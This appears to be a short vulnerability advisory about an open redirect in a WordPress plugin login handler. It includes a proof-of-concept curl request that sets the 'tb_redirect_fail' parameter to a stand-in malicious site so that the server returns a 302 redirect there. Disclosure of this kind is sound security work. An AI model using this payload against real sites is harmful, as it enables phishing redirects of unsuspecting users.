Description The plugin does not validate a parameter before redirecting the user to its value, leading to an Open Redirect issue
curl -kvL https://www.example.com/wp-login.php \
-e http://arbitrary-referer \
-d "log=invalid_username&pwd=invalid_password&tb_login=1&tb_redirect_fail=https://malicious-site.com"
- `https://www.example.com` should be replaced with the affected WordPress site URL.
- The request triggers a 302 redirect to the URL specified in `tb_redirect_fail`.